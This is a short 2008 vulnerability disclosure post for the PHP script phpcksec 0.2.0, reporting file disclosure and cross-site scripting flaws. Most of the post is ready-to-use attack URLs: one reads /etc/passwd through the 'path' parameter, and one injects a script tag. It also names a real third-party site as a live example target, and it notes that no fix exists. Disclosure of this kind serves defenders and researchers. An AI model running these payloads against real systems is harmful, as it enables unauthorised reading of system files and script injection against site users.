phpcksec 0.2.0 (XSS-FD) Multiple Remote Vulnerabilities

2008-12-17 16:33:57

........

(XSS / FD Vulnerability)
----------------------------------
script:phpcksec v0.2.0


***************************************************
download from:http://www.ott.net/software/phpcksec/

***************************************************

........................................................

http://www.site.com/path/phpcksec.php?path=/etc/passwd

xss:

http://www.site.com/path/phpcksec.php?path=>\'><ScRiPt >alert(0);</ScRiPt>

***************************************************
***************************************************

Author: ahmadbady
---------------------

EXAMPLE:http://nerdbynature.de/bits/phpcksec/phpcksec.php?path=/etc/passwd

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.